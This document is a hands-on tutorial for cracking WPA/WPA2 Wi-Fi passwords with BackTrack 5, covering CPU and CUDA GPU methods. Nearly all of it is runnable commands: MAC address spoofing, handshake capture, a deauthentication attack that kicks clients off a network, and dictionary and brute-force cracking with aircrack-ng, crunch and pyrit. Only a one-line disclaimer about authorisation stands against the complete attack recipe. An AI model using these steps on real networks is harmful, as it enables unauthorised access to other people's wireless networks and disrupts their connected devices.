HOWTO : WPA/WPA2 cracking with Back|Track 5

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.



(A) General Display card



Step 1 :



airmon-ng



The result will be something like :



Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]






Step 2 :



airmon-ng start wlan0



Step 3 (Optional) :



Change the mac address of the mon0 interface.



ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up




Step 4 :



airodump-ng mon0



Then, press "Ctrl+c" to break the program.



Step 5 :



airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0



*where -c is the channel

           -w is the file to be written

           --bssid is the BSSID



This terminal is keeping running.



Step 6 :



open another terminal.



aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0



*where -a is the BSSID

           -c is the client MAC address (STATION)



Wait for the handshake.



Step 7 :



Use the John the Ripper as word list to crack the WPA/WP2 password.



aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs



Step 8 (Optional) :



If you do not want to use John the Ripper as word list, you can use Crunch.



Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/



Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download



tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install




/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



(B) nVidia Display Card with CUDA



If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.



Step a :



airmon-ng



The result will be something like :



Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]






Step b :



airmon-ng start wlan0



Step c (Optional) :



Change the mac address of the mon0 interface.



ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up




Step d :



airodump-ng mon0



Then, press "Ctrl+c" to break the program.



Step e :



airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0



Step f :



open another terminal.



aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0



*where -a is the BSSID

           -c is the client MAC address (STATION)



Wait for the handshake.



Step g :



If the following programs are not yet installed, please do it.



apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy



Step h :



Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/



Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download



tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install




Step i :



Go to the official site of pyrit.



http://code.google.com/p/pyrit/downloads/list



Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).



tar -xzvf pyrit-0.4.0.tar.gz

cd pyrit-0.4.0

python setup.py build

sudo python setup.py install




tar -xzvf cpyrit-cuda-0.4.0.tar.gz

cd cpyrit-cuda-0.4.0

python setup.py build

sudo python setup.py install




Step j :



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



Step k (Optional) :



If you encounter error when reading the wpacrack-01.cap, you should do the following step.



pyrit -r wpacrack-01.cap -o new.cap stripLive



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



Step l :



Then, you will see something similar to the following.



Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+



Parsing file 'new.cap' (1/1)...

Parsed 71 packets (71 802.11-packets), got 55 AP(s)



Tried 17960898 PMKs so far; 17504 PMKs per second.




Remarks :



If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.



To test if your wireless card (either USB or PCI-e) can do the injection or not :



airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0



Make sure pyrit workable on your system :



pyrit list_cores



That's all! See you.